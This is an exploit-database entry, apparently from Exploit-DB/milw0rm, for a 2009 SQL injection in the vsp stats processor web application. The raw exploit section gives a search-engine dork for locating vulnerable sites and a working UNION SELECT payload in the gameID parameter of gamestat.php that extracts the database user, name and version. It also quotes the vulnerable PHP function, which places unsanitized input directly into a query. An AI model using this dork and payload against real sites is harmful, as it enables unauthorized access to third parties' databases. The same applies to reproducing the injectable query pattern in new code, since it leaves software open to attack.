SQL-injection

vendor:

vsp stats processor

by:

Dimi4

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: vsp stats processor

Affected Version From: all

Affected Version To: all

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A SQL injection vulnerability exists in vsp stats processor, due to improper sanitization of user-supplied input in the 'gameID' parameter of the 'gamestat.php' script. An attacker can exploit this vulnerability to gain access to the underlying database, and execute arbitrary SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################
#                                         #
# Product : vsp stats processor           #
# Version : all                           #
# Dork : "powered by vsp stats processor" #
# Site: http://www.scivox.net/vsp/        #
# Found by: Dimi4                         #
# Date : 31.03.09                         #
# Greetz: antichat                        #
#                                         #
########################################

SQL-injection
[+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php
[+] Output: <option> {DATA} </option>

Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines)

 function getStatsGame()
{
  global $db;
  global $ggame;
  $sql = "select name, value
            from {$GLOBALS['cfg']['db']['table_prefix']}gamedata
            where gameID=$GLOBALS[gameID]
         ";

  //echo $sql;
  $rs = $db->Execute($sql);

.....
}


(c) Dimi4, 2009 greetz to antichat

# milw0rm.com [2009-03-31]